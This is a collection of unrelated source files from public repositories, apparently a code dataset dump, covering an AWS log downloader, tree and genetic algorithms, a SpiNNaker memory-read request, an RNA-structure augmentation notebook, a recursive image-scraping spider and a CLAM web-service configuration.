plt.show()\r\n","repo_name":"GeniusAng/LogisticRegression","sub_path":"LogisticRegression.py","file_name":"LogisticRegression.py","file_ext":"py","file_size_in_byte":5655,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"10294899538","text":"import argparse\r\nimport json\r\nimport os\r\n\r\nfrom tqdm import tqdm\r\n\r\nimport utils\r\n\r\n\r\ndef log_streams_of_a_group(client, group_name):\r\n response = client.describe_log_streams(\r\n logGroupName=group_name,\r\n orderBy='LastEventTime',\r\n descending=True,\r\n )\r\n streams = [i['logStreamName'] for i in response['logStreams']]\r\n while 'nextToken' in response:\r\n response = client.describe_log_streams(\r\n logGroupName=group_name,\r\n orderBy='LastEventTime',\r\n descending=True,\r\n nextToken=response['nextToken'],\r\n )\r\n try:\r\n if response['ResponseMetadata']['HTTPStatusCode'] == 200:\r\n pass\r\n except KeyError:\r\n print(response)\r\n raise AssertionError('Failed to fetch log streams.')\r\n streams.extend([i['logStreamName'] for i in response['logStreams']])\r\n \r\n return streams\r\n\r\n\r\ndef log_events_of_a_stream(client, group_name, stream_name):\r\n response = client.get_log_events(\r\n logGroupName=group_name,\r\n logStreamName=stream_name,\r\n )\r\n events = response['events']\r\n while 'nextForwardToken' in response:\r\n response = client.get_log_events(\r\n logGroupName=group_name,\r\n logStreamName=stream_name,\r\n nextToken=response['nextForwardToken'],\r\n )\r\n if not response['events']:\r\n break\r\n try:\r\n if response['ResponseMetadata']['HTTPStatusCode'] == 200:\r\n pass\r\n except KeyError:\r\n print(response)\r\n raise AssertionError('Failed to fetch log events.')\r\n events.extend(response['events'])\r\n \r\n return events\r\n\r\n\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument('-f', '--force_all', help='force download all log streams even if output_dir is provided', action='store_true')\r\nparser.add_argument('-g', '--group', help='name of the group (e.g., lambda function) for which logs are to be fetched')\r\nparser.add_argument('-o', '--output_dir', help='output folder for logs')\r\nparser.add_argument('-p', '--prefix', help='prefix for the group name (default: /aws/lambda/)')\r\nparser.add_argument('-d', '--delete', help='delete log stream after downloading it', action='store_true')\r\nparser.add_argument('-b', '--beautify', help='store JSON with indentation', action='store_true')\r\nargs = parser.parse_args()\r\n\r\nif args.output_dir:\r\n output_dir = os.path.abspath(args.output_dir.replace('\"', ''))\r\nelse:\r\n output_dir = 'Logs'\r\n\r\nos.makedirs(output_dir, exist_ok=True)\r\nalready_downloaded = os.listdir(output_dir)\r\n\r\nclient = utils.aws_client('logs')\r\n\r\nif args.group:\r\n prefix = args.prefix or '/aws/lambda/'\r\n group_name = prefix + args.group\r\nelse:\r\n log_groups = client.describe_log_groups()\r\n group_name = log_groups['logGroups'][0]['logGroupName']\r\n\r\nif args.beautify:\r\n output_indent = 4\r\nelse:\r\n output_indent = None\r\n\r\nlog_streams = log_streams_of_a_group(client, group_name)\r\nfor stream_name in tqdm(log_streams):\r\n file_name = stream_name.replace('/', '-') + '.log'\r\n \r\n if args.force_all or file_name not in already_downloaded:\r\n events = log_events_of_a_stream(client, group_name, stream_name)\r\n with open(os.path.join(output_dir, file_name), 'w') as fw:\r\n json.dump(events, fw, indent=output_indent)\r\n \r\n if args.delete:\r\n client.delete_log_stream(\r\n 
logGroupName=group_name,\r\n                logStreamName=stream_name,\r\n            )\r\n","repo_name":"mahesh01010011/Lambda-Tools","sub_path":"download_logs.py","file_name":"download_logs.py","file_ext":"py","file_size_in_byte":3537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"2176307333","text":"class CajeroAutomatico:\r\n    def __init__(self):\r\n        self.saldo = 1000 \r\n\r\n    def realizarRetiro(self, monto):\r\n        if self.saldo >= monto:\r\n            self.saldo -= monto\r\n            print(f\"Withdrawal of {monto} completed. New balance: {self.saldo}\")\r\n        else:\r\n            print(\"Insufficient funds.\")\r\n\r\n\r\ncajero = CajeroAutomatico()\r\nmonto_retiro = float(input(\"Enter the amount you want to withdraw: \"))\r\ncajero.realizarRetiro(monto_retiro)\r\n","repo_name":"AlexRD30/algoritmo-paralelo","sub_path":"practica/cajero.py","file_name":"cajero.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"20653524505","text":"# coding=utf-8\nfrom typing import List\n\nfrom deap import creator\n\nfrom algorithms.standard import Standard\nfrom dependency_injection.required_feature import RequiredFeature\nfrom generation.individual import Individual\nfrom util import logger\n\n\nclass Monotonic(Standard):\n    \"\"\"Implements the Monotonic Evolutionary Algorithm as described in [CamposGFEA17]_.\n\n    The Monotonic version of the Standard GA only includes either the best offspring or the best parent in the next\n    population (whereas the Standard GA includes both offspring in the next population regardless of their fitness\n    value).\n\n    .. [CamposGFEA17] J. Campos, Y. Ge, G. Fraser, M. Eler, and A. Arcuri,\n        “An Empirical Evaluation of Evolutionary Algorithms for Test Suite Generation”,\n        in Search Based Software Engineering, 2017, pp. 
33–48.\n \"\"\"\n\n def __init__(self) -> None:\n super(Monotonic, self).__init__()\n\n def evolve(self) -> List[Individual]:\n verbose_level: bool = RequiredFeature('verbose_level').request()\n\n for gen in range(1, self.max_generations):\n\n if not self.budget_manager.is_budget_available():\n print(\"Budget ran out, exiting evolve\")\n break\n\n logger.log_progress(f\"\\n---> Starting generation {str(gen)}\"\n f\" at {str(self.budget_manager.get_time_budget_used())}\")\n\n # create new population, starting with elitism\n new_population: List[Individual] = self.toolbox.selectBest(self.population, self.elitism_size)\n while len(new_population) < self.population_size:\n # select parents\n parents: List[Individual] = self.toolbox.select(self.population, 2)\n\n # generate offspring\n needed_offspring = min(self.population_size - len(new_population), 2)\n offspring: List[Individual] = self.crossover(parents, gen, needed_offspring,\n base_index_in_generation=len(new_population))\n self.mutation(offspring)\n\n success = self.parallel_evaluator.evaluate(offspring)\n if not success:\n print(\"Budget ran out during parallel evaluation, exiting evolve\")\n return self.population\n\n # extend new population with offspring or parents, depending which ones have the best individual\n best_ind, = self.toolbox.selectBest(offspring + parents, 1)\n if best_ind in offspring:\n new_population.extend(offspring)\n else:\n new_population.extend(parents)\n\n self.population = new_population.copy()\n\n self.parallel_evaluator.test_suite_evaluator.update_logbook(gen, self.population)\n\n if verbose_level > 0:\n logger.log_progress(f\"\\nFinished generation {str(gen)} \"\n f\"at {str(self.budget_manager.get_time_budget_used())}\")\n\n return self.population\n","repo_name":"FlyingPumba/evolutiz","sub_path":"algorithms/monotonic.py","file_name":"monotonic.py","file_ext":"py","file_size_in_byte":3068,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"22"} +{"seq_id":"45450280669","text":"# Problem Statement\n#\n\n\nfrom trees import LinkedBinaryTree, BuildLinkedBinaryTree\nfrom trees.utils import Traversal\n\n\ndef get_bt_inorder_predecessor(binary_tree: LinkedBinaryTree, node: LinkedBinaryTree.BinaryTreeNode = None, node_data=None):\n def get_max_left_subtree_node(current_node):\n while binary_tree.right(current_node):\n current_node = binary_tree.right(current_node)\n return current_node\n\n def get_bt_inorder_predecessor_from_key():\n given_node_right_ancestor = None\n\n def _get_bt_inorder_predecessor_from_key(current_node):\n nonlocal given_node_right_ancestor\n\n if node_data == current_node.data:\n if binary_tree.left(current_node):\n given_node_right_ancestor = get_max_left_subtree_node(binary_tree.left(current_node))\n return True\n\n if binary_tree.right(current_node):\n if _get_bt_inorder_predecessor_from_key(binary_tree.right(current_node)):\n if not given_node_right_ancestor:\n given_node_right_ancestor = current_node\n return True\n\n if binary_tree.left(current_node):\n if _get_bt_inorder_predecessor_from_key(binary_tree.left(current_node)):\n return True\n\n return False\n _get_bt_inorder_predecessor_from_key(binary_tree.root())\n return given_node_right_ancestor\n\n given_node = node\n assert given_node or node_data, 'Either of Node or Node-data must be provided'\n\n if given_node and binary_tree.left(given_node):\n return get_max_left_subtree_node(binary_tree.left(given_node))\n\n return get_bt_inorder_predecessor_from_key()\n\n\n# driver code\ndef run():\n 
binary_tree = BuildLinkedBinaryTree(auto_populate=True, list_of_nodes=[60, 70, 80, 90, 100]).get_tree()\n    node_data = 60\n    inorder_predecessor_node = get_bt_inorder_predecessor(binary_tree, node_data=node_data)\n\n    Traversal(binary_tree).print_inorder_traversal()\n    # Traversal(binary_tree).print_level_order_traversal()\n    if inorder_predecessor_node:\n        print(f'In-order predecessor of the node({node_data}): ', inorder_predecessor_node.data)\n    else:\n        print(f'In-order predecessor of given node({node_data}) doesn\\'t exist')\n\n\nif __name__ == '__main__':\n    run()\n","repo_name":"veerat-beri/dsalgo","sub_path":"trees/utils/inorder_predecessor_bt.py","file_name":"inorder_predecessor_bt.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"22"} +{"seq_id":"15024435795","text":"#############\r\n'''\r\nf = open(file_name)\r\ntotal = 0\r\nfor line in f:\r\n    if \"apple\" in line:\r\n        total += 1\r\nf.close()\r\nprint total\r\n'''\r\n#############\r\ndtprnt = 'What word are we searching for?'\r\nmatra = 'The total number of '\r\nisx = ' is '\r\nwarnuser = 'If you did not find what you are looking for,\\n remember that this is case sensitive.'\r\noki = 'ok'\r\nfnprint = 'CURRENTLY NONOPERATIONAL: What file would you like to open?'\r\n#############\r\n\r\n\r\n\r\nprint (dtprnt)\r\ndatas = input()\r\nprint (oki)\r\nprint (fnprint)\r\nfn = input()\r\nprint (oki)\r\n\r\n#############\r\nf = open(\"ex20150609.log\", \"r\")\r\nwcount = 0\r\nfor line in f:\r\n    if datas in line:\r\n        wcount += 1\r\nf.close()\r\nprint (matra + datas+ isx, wcount)\r\nprint (warnuser)\r\n","repo_name":"phastings1/TextCounter","sub_path":"Xxyxxx.py","file_name":"Xxyxxx.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"3468354685","text":"from spinn_utilities.overrides import overrides\nfrom spinn_utilities.typing.coords import XYP\nfrom spinnman.messages.scp import SCPRequestHeader\nfrom spinnman.messages.scp.abstract_messages import (\n    AbstractSCPRequest, AbstractSCPResponse)\nfrom spinnman.messages.scp.enums import SCPCommand, SCPResult\nfrom spinnman.messages.sdp import SDPFlag, SDPHeader\nfrom spinnman.exceptions import SpinnmanUnexpectedResponseCodeException\nfrom spinnman.constants import address_length_dtype\n\n\nclass Response(AbstractSCPResponse):\n    \"\"\"\n    An SCP response to a request to read a region of memory on a chip.\n    \"\"\"\n    __slots__ = (\n        \"_data\",\n        \"_length\",\n        \"_offset\",\n        \"__op\",\n        \"__cmd\")\n\n    def __init__(self, operation: str, command: str) -> None:\n        super().__init__()\n        self._data = b''\n        self._length = 0\n        self._offset = 0\n        self.__op = operation\n        self.__cmd = command\n\n    @overrides(AbstractSCPResponse.read_data_bytestring)\n    def read_data_bytestring(self, data: bytes, offset: int):\n        assert self._scp_response_header is not None\n        if self._scp_response_header.result != SCPResult.RC_OK:\n            raise SpinnmanUnexpectedResponseCodeException(\n                self.__op, self.__cmd, self._scp_response_header.result)\n        self._data = data\n        self._offset = offset\n        self._length = len(data) - offset\n\n    @property\n    def data(self) -> bytes:\n        \"\"\"\n        The data read.\n\n        .. 
note::\n The data starts at offset.\n\n :rtype: bytearray\n \"\"\"\n return self._data\n\n @property\n def offset(self) -> int:\n \"\"\"\n The offset where the valid data starts.\n\n :rtype: int\n \"\"\"\n return self._offset\n\n @property\n def length(self) -> int:\n \"\"\"\n The length of the valid data.\n\n :rtype: int\n \"\"\"\n return self._length\n\n\nclass ReadMemory(AbstractSCPRequest[Response]):\n \"\"\"\n An SCP request to read a region of memory on a chip.\n \"\"\"\n __slots__ = ()\n\n def __init__(self, coordinates: XYP, base_address: int, size: int):\n \"\"\"\n :param tuple coordinates:\n The X,Y,P coordinates of the chip to read from;\n X and Y between 0 and 255, P between 0 and 17\n :param int base_address:\n The positive base address to start the read from\n :param int size: The number of bytes to read, between 1 and 256\n :raise SpinnmanInvalidParameterException:\n * If the chip coordinates are out of range\n * If the base address is not a positive number\n * If the size is out of range\n \"\"\"\n x, y, cpu = coordinates\n super().__init__(\n SDPHeader(\n flags=SDPFlag.REPLY_EXPECTED, destination_port=0,\n destination_cpu=cpu, destination_chip_x=x,\n destination_chip_y=y),\n SCPRequestHeader(command=SCPCommand.CMD_READ),\n argument_1=base_address, argument_2=size,\n argument_3=address_length_dtype[\n (base_address % 4, size % 4)].value)\n\n @overrides(AbstractSCPRequest.get_scp_response)\n def get_scp_response(self) -> Response:\n return Response(\"read memory\", \"CMD_READ\")\n","repo_name":"SpiNNakerManchester/SpiNNMan","sub_path":"spinnman/messages/scp/impl/read_memory.py","file_name":"read_memory.py","file_ext":"py","file_size_in_byte":3295,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"22"} +{"seq_id":"72956427255","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\n\nget_ipython().system('wget https://www.tbi.univie.ac.at/RNA/download/ubuntu/ubuntu_18_04/viennarna_2.4.15-1_amd64.deb')\nget_ipython().system('apt-get install ./viennarna_2.4.15-1_amd64.deb -y')\nget_ipython().system('git clone https://github.com/DasLab/arnie')\n\nget_ipython().system('/opt/conda/bin/python3.7 -m pip install --upgrade pip')\nget_ipython().system('git clone https://www.github.com/DasLab/draw_rna draw_rna_pkg')\nget_ipython().system('cd draw_rna_pkg && python setup.py install')\n\nget_ipython().system(\"yes '' | cpan -i Graph\")\nget_ipython().system('git clone https://github.com/hendrixlab/bpRNA')\n\n\n\n\nimport os\nimport sys\n\nget_ipython().system('echo \"vienna_2: /usr/bin\" > arnie.conf')\nget_ipython().system('echo \"TMP: /kaggle/working/tmp\" >> arnie.conf')\nget_ipython().system('mkdir -p /kaggle/working/tmp')\nos.environ[\"ARNIEFILE\"] = f\"/kaggle/working/arnie.conf\"\nsys.path.append('/kaggle/working/draw_rna_pkg/')\nsys.path.append('/kaggle/working/draw_rna_pkg/ipynb/')\npkg = 'vienna_2'\n\n\n\n\n\nimport numpy as np\nimport pandas as pd\nfrom multiprocessing import Pool\nfrom arnie.pfunc import pfunc\nfrom arnie.mea.mea import MEA\nfrom arnie.free_energy import free_energy\nfrom arnie.bpps import bpps\nfrom arnie.mfe import mfe\nimport arnie.utils as utils\nfrom tqdm.notebook import tqdm as tqdm\n\nn_candidates = 2\n# turn off for all data\ndebug = True\n\n\n\n\nget_ipython().system('grep processor /proc/cpuinfo | wc -l')\n\n\n\n\nMAX_THRE = 4\n\n\n\n\ntrain = pd.read_json('../input/stanford-covid-vaccine/train.json', lines=True)\ntest = pd.read_json('../input/stanford-covid-vaccine/test.json', lines=True)\nif debug:\n train = 
train[:20]\n test = test[:20]\ntarget_df = train.append(test)\n\n\n\n\ndef proc1(arg):\n sequence = arg[0]\n id = arg[1]\n log_gamma = arg[2]\n bp_matrix = bpps(sequence, package=pkg)\n mea_mdl = MEA(bp_matrix,gamma=10**log_gamma)\n return id, sequence, mea_mdl.structure, log_gamma, mea_mdl.score_expected()[2]\n\nli = []\nfor log_gamma in range(10):\n for i, arr in enumerate(target_df[['sequence','id']].values):\n li.append([arr[0], arr[1], log_gamma])\n\np = Pool(processes=MAX_THRE)\nresults = []\nfor ret in tqdm(p.imap(proc1, li),total=len(li)):\n results.append(ret)\n #print(f'done for {ret[0]}')\ndf = pd.DataFrame(results, columns=['id', 'sequence', 'structure', 'log_gamma', 'score'])\n\ndf_tmp = target_df[['id', 'sequence', 'structure']].copy()\ndf_tmp['log_gamma'] = 100\ndf_tmp['score'] = 100\ndf = df.append(df_tmp).sort_values('score', ascending=False).reset_index(drop=True)\n\nnew_df = pd.DataFrame()\nfor id in df['id'].unique():\n unq_df = df[df['id'] == id].drop_duplicates('structure')\n unq_df['cnt'] = unq_df.shape[0]\n new_df = new_df.append(unq_df[1:min(n_candidates,len(unq_df))])\n\n\n\n\nget_ipython().system('mkdir -p tmp_files')\ndef get_predicted_loop_type(id, sequence, structure, debug=False):\n structure_fixed = structure.replace('.','0').replace('(','1').replace(')','2')\n pid = os.getpid()\n tmp_in_file = f'tmp_files/{id}_{structure_fixed}_{pid}.dbn'\n tmp_out_file = f'{id}_{structure_fixed}_{pid}.st'\n get_ipython().system('echo $sequence > $tmp_in_file')\n get_ipython().system('echo \"$structure\" >> $tmp_in_file')\n get_ipython().system('export PERL5LIB=/root/perl5/lib/perl5 && perl bpRNA/bpRNA.pl $tmp_in_file')\n result = [l.strip('\\n') for l in open(tmp_out_file)]\n if debug:\n print(sequence)\n print(structure)\n print(result[5])\n else:\n get_ipython().system('rm $tmp_out_file $tmp_in_file')\n return id, structure, result[5]\n\ndef proc2(arg):\n result = get_predicted_loop_type(arg[0], arg[1], arg[2], debug=False)\n return result\n\nli = []\nfor i, arr in enumerate(new_df[['id', 'sequence', 'structure']].values):\n li.append(arr)\n\np = Pool(processes=MAX_THRE)\nresults_loop_type = []\nfor ret in tqdm(p.imap(proc2, li),total=len(li)):\n results_loop_type.append(ret)\n #print(f'done for {ret[0]}')\n\nnew_df = new_df.merge(pd.DataFrame(results_loop_type, columns=('id', 'structure', 'predicted_loop_type')), on=['id','structure'], how='left')\nnew_df.to_csv('aug_data.csv', index=False)\n\n\n\n\nnew_df.head()\n\n\n\n\n\n\n","repo_name":"aorursy/lost-nb","sub_path":"its7171_how-to-generate-augmentation-data.py","file_name":"its7171_how-to-generate-augmentation-data.py","file_ext":"py","file_size_in_byte":4182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"6242258387","text":"class Solution:\n def validateStackSequences(self, pushed: List[int], popped: List[int]) -> bool:\n lenPushPop, posPush, posPop = len(pushed), 0, 0\n lst = []\n while(posPush < lenPushPop):\n if(not lst or lst[-1] != popped[posPop]):\n lst.append(pushed[posPush])\n posPush += 1\n else:\n lst.pop()\n posPop += 1\n return(True if lst[::-1] == popped[posPop:] else False)","repo_name":"saudbadar/LeetCode-Answers","sub_path":"946. 
Validate Stack Sequences/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"6735130941","text":"name = 'Cheshta'\r\nage = 15\r\nprint (name,age)\r\nlist1=[1,2,3,'abc','45']\r\nprint (list1)\r\n\"\"\" poketMoney=int(input('enter your poket Money'))\r\nprint (poketMoney)\r\nif(poketMoney <500):\r\n print ('you are poor')\r\nelse:\r\n print ('you are quit rich') \"\"\"\r\n\"\"\" age = int(input('enter your Age'))\r\nif(age <=12):\r\n print ('You are still a kid')\r\nelif (age>12 and age<=18):\r\n print ('You are a teenager')\r\nelse:\r\n print(\"you can Vote\") \"\"\"\r\n\r\nfor item in list1:\r\n print (item)\r\ncount = 5\r\nwhile count >=0:\r\n print(count)\r\n count-=1 ","repo_name":"cheshta-kabra/C-97","sub_path":"Texting.py","file_name":"Texting.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"6251151612","text":"donors = [('Donor A', [50, 100, 25, 100]),\n ('Donor B', [100, 25]),\n ('Donor C', [300])\n ]\n\ndef totaldonations(donations):\n return donations[1]\n\ndef report():\n report = []\n for (donor, amounts) in donors:\n report.append((donor, sum(amounts), len(amounts), sum(amounts)/len(amounts)))\n report.sort(key = totaldonations, reverse = True)\n print('Donor Name',' '*10, '| Total Given |', ' Num Gifts ', '| Average Gift |')\n print('-'*70)\n for (donor, total, num, avg) in report:\n print(donor, ' '*(21 - len(str(donor))), #print donor\n '$', ' '*(12 - len(str(total))), total, #print sum\n ' '*(12 - len(str(num))), num, #print num\n ' $', ' '*(12 - len(str(avg))), avg, #print avg\n )\n","repo_name":"UWPCE-PythonCert-ClassRepos/Sp2018-Accelerated","sub_path":"students/Osiddiquee/lesson03/mailroom_report.py","file_name":"mailroom_report.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"2974032214","text":"import random\n\n# function prompting player to choose between rock paper or scissors\ndef player_rps():\n while True: \n print(\"Do you choose rock, paper, or scissors?\")\n player_choice = input()\n player_choice = player_choice.lower()\n if player_choice != \"rock\" and player_choice != \"paper\" and player_choice != \"scissors\":\n print(\"Please choose between: rock, paper, scissors\") \n else:\n return player_choice \n\n# function randomly selecting a choice for the computer\ndef computer_rps():\n options = [\"rock\", \"paper\", \"scissors\"]\n computer_choice = options[random.randint(0, 2)]\n return computer_choice\n \n# output: prints the winner of the game\ndef rps(player, computer):\n if player == computer:\n print(\"It's a tie!\")\n elif player == \"rock\":\n if computer == \"scissors\":\n print(\"You won! Congrats!\")\n else:\n print(\"The computer won :(\")\n elif player == \"paper\":\n if computer == \"rock\":\n print(\"You won! Congrats!\")\n else:\n print(\"The computer won :(\")\n elif player == \"scissors\":\n if computer == \"paper\":\n print(\"You won! 
Congrats!\")\n else:\n print(\"The computer won :(\")\n\nplay = \"yes\"\nwhile play == \"yes\":\n # game greeting\n print(\"Welcome to Rock, Paper, Scissors!\")\n\n # ask player to input their rps choice\n player = player_rps()\n \n # computer randomly chooses\n computer = computer_rps()\n print(\"-----\")\n\n # print the results of the game\n print(\"You chose: \" + player.upper())\n print(\"The computer chose: \" + computer.upper())\n print(\"-----\")\n rps(player, computer)\n\n # ask user if they'd like to play again\n play = input(\"Would you like to play again? (yes or no)\")\n print(\"-----\")\n\nprint(\"Thank you for playing!\")\n \n","repo_name":"alexandroid01/rock-paper-scissors","sub_path":"rps.py","file_name":"rps.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"12497344976","text":"\nfrom concurrent.futures import ThreadPoolExecutor, wait , ALL_COMPLETED\nfrom functools import partial\nimport splat\nimport wisps\nfrom wisps import make_spt_number\nimport pandas as pd\nimport numpy as np\n\ndef add_noise_to_spectrum(sp, snr):\n #if I propose a larger SNR don't do anything to save time\n sp.reset()\n sp_old=sp.spectral_type\n sp.add_noise(snr, nsample=1, recompute_indices= True)\n f_test={\"f_test\": sp.f_test, 'line_chi': sp.line_chi, 'name': sp.name, 'spex_chi': sp.spex_chi, \\\n 'spt_new': sp.spectral_type, 'sp_old': sp_old, 'dof': sp.dof}\n res_dict= {**sp.snr, **sp.indices, **f_test}\n sp.reset()\n return res_dict\n \ndef add_multiple_noises(sp, noises):\n res=list(map(lambda x: add_noise_to_spectrum(sp, x), noises))\n return res\n\ndef add_noise_to_spectra(nsample=10, filein=wisps.LIBRARIES+'/ydwarfs.pkl', fileout=wisps.LIBRARIES+'/ydwarfs_plus_noise.pkl') :\n spectra=pd.read_pickle(filein)\n snrs=10**np.random.uniform(-1,3,(len(spectra), nsample))\n iterables=([spectra, snrs])\n\n method=partial(add_multiple_noises)\n with ThreadPoolExecutor(max_workers=100) as executor:\n futures=list(executor.map( method, *iterables, timeout=None, chunksize=10))\n\n results=[x for x in futures]\n\n df=pd.DataFrame.from_records(results)\n df.to_pickle(fileout, protocol=2)\n\nif __name__ =='__main__':\n #add_noise_to_spectra(nsample=500)\n add_noise_to_spectra(nsample=500, filein=wisps.LIBRARIES+'/subdwarfs.pkl', fileout=wisps.LIBRARIES+'/subdwarfs_plus_noise.pkl')","repo_name":"caganze/wisps","sub_path":"wisps/simulations/addnoisetotemplates.py","file_name":"addnoisetotemplates.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"33550455042","text":"import requests as req\nfrom bs4 import BeautifulSoup as bs\nimport argparse\nimport threading\nimport atexit\n#handle 429 exception (too many requests)\n\nalready_visited=set()\nalready_downloaded=set()\n\ndef exit_print():\n\tprint(f\"Pages visited: {len(already_visited)}\")\n\tprint(f\"Images downloaded: {len(already_downloaded)}\")\n\ndef parse():\n\tparser = argparse.ArgumentParser(\n\t\tprog = 'python3 spider.py', \n\t\tdescription = 'scrape images from URL'\n\t)\n\tparser.add_argument('URL', help='URL to scrape')\n\tparser.add_argument('-r', action='store_true', help='recursive scraping, recommended use with -l', default = False)\n\tparser.add_argument('-l', help ='specify how many levels of recursive search (default is 1), if used without -r its ignored', default = 0)\n\tparser.add_argument('-p', help='specify path where images 
are saved (default is ./data)', default='./data')\n\tparser.add_argument('-o', action='store_false', help='go through the web, but not out of it; for this option it is important to start the url with \"https://www\"', default = True)\n\targs = parser.parse_args()\n\treturn args.__dict__\n\ndef url_converter(base_url, url):\n\tif (url.startswith(\"//\")):\n\t\turl = \"https:\" + url\n\telif (url.startswith(\"/\")):\n\t\turl = base_url + url\n\treturn url\n\n#handle xlink:href\ndef recursive_main(url, depth):\n\talready_visited.add(url)\n\tprint(url)\n\tprint(f\"Depth: {depth}\")\n\ttry:\n\t\tresponse = req.get(url, timeout = 2)\n\t\tprint(f\"Response: {response.status_code}\")\n\t\tprint()\n\texcept Exception:\n\t\tprint(\"Couldn't open url\")\n\t\tprint()\n\t\treturn\n\tif (response.status_code != 200):\n\t\treturn\n\ttry:\n\t\tsoup = bs(response.content, \"lxml\")\n\texcept:\n\t\treturn\n\t#download this page's images on a worker thread: pass the callable and its args, then start it\n\tthreading.Thread(target=download_images, args=(url, soup)).start()\n\tif (depth >= level):\n\t\treturn\n\tlinks_html = soup.find_all('a')\n\tfor link_html in links_html:\n\t\ttry:\n\t\t\treal_url = link_html['href']\n\t\texcept Exception:\n\t\t\tpass\n\t\telse:\n\t\t\treal_url = url_converter(url, real_url)\n\t\t\tif (real_url.startswith(cant_exit_url) and real_url not in already_visited):\n\t\t\t\trecursive_main(real_url, depth + 1)\n\ndef valid_image(url):\n\treturn url.endswith(\".jpg\") or url.endswith(\".jpeg\") or url.endswith(\".png\") or url.endswith(\".gif\") or url.endswith(\".bpm\") \n\n#handle image icons tags\ndef download_images(url, beautiful):\n\timages_html = beautiful.find_all('img')\n\tfor image_html in images_html:\n\t\ttry:\n\t\t\tsrc = image_html['src']\n\t\texcept:\n\t\t\tpass\n\t\telse:\n\t\t\tsrc = url_converter(url, src)\n\t\t\tif (src not in already_downloaded):\n\t\t\t\talready_downloaded.add(src)\n\t\t\t\tif (valid_image(src)):\n\t\t\t\t\ttry:\n\t\t\t\t\t\timage = req.get(src, timeout=2)\n\t\t\t\t\texcept Exception:\n\t\t\t\t\t\tpass\n\t\t\t\t\telse:\n\t\t\t\t\t\tif (image.status_code == 200):\n\t\t\t\t\t\t\tif len(src) > 255:\n\t\t\t\t\t\t\t\tsrc = src[-255:-1] + src[-1]\n\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\twith open(path + '/' + src.replace('/','|'), \"wb\") as file:\n\t\t\t\t\t\t\t\t\tfile.write(image.content)\n\t\t\t\t\t\t\texcept MemoryError:\n\t\t\t\t\t\t\t\tprint(\"You ran out of memory!\")\n\t\t\t\t\t\t\t\texit()\n\t\t\t\t\t\t\texcept Exception:\n\t\t\t\t\t\t\t\tprint(\"Couldn't download image from \" + src + \" check if folder in which images will be downloaded (./data by default) exists\")\n\nif __name__ == \"__main__\":\n\tatexit.register(exit_print)\n\targs = parse()\n\tglobal level, path, cant_exit_url\n\tcant_exit_url = \"\"\n\turl = args.get('URL')\n\trecursive = args.get('r')\n\tlevel = int(args.get('l'))\n\tif not recursive:\n\t\tlevel = 0 \n\tif recursive and level == 0:\n\t\tlevel = 1 \n\tpath = args.get('p')\n\tout = args.get('o')\n\tif not out:\n\t\tsplitted = url.split('/')\n\t\tcant_exit_url = splitted[0] + \"//\" + splitted[2]\n\trecursive_main(url, 0)\n","repo_name":"migueldar/42CyberSec_arachnida","sub_path":"spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":3502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"}{"seq_id":"32499509779","text":"#!/usr/bin/env python3\n#-*- coding:utf-8 -*-\n\n\n###############################################################\n# CLAM: Computational Linguistics Application Mediator\n# -- Settings --\n# by Maarten van Gompel (proycon)\n# 
http://proycon.github.io/clam/\n# Centre for Language and Speech Technology / Language Machines\n# Radboud University Nijmegen\n#\n# Licensed under GPLv3\n#\n###############################################################\n\n\nfrom __future__ import print_function, unicode_literals, division, absolute_import\n\nfrom clam.common.parameters import *\nfrom clam.common.formats import *\nfrom clam.common.viewers import *\nfrom clam.common.data import *\nfrom clam.common.converters import *\nfrom clam.common.digestauth import pwhash\nimport clamservices.wrappers\nimport os\nfrom base64 import b64decode as D\n\nREQUIRE_VERSION = 2.0\nWRAPPERDIR = clamservices.wrappers.__path__[0]\n\n#THIS CONFIGURATION IS FOR FROG >= 0.12.10 ! OLDER VERSIONS WON'T WORK WITH IT!\n\n#============== General meta configuration =================\nSYSTEM_ID = \"frog\"\nSYSTEM_NAME = \"Frog\"\nSYSTEM_DESCRIPTION = \"Frog is a suite containing a tokeniser, Part-of-Speech tagger, lemmatiser, morphological analyser, shallow parser, and dependency parser for Dutch, developed at Tilburg University. It is the successor of Tadpole.\"\n\n\nUSERS = None\n\n# ================ Server specific configuration for CLAM ===============\nhost = os.uname()[1]\nif 'VIRTUAL_ENV' in os.environ and os.path.exists(os.environ['VIRTUAL_ENV'] +'/bin/frog'):\n # Virtual Environment (LaMachine)\n ROOT = os.environ['VIRTUAL_ENV'] + \"/frog.clam/\"\n PORT = 8801\n BINDIR = os.environ['VIRTUAL_ENV'] + '/bin/'\n FLATURL = \"http://127.0.0.1:8000\" #local LaMachine FLAT\n\n if host == 'applejack': #configuration for server in Nijmegen\n HOST = \"webservices-lst.science.ru.nl\"\n URLPREFIX = 'frog'\n\n 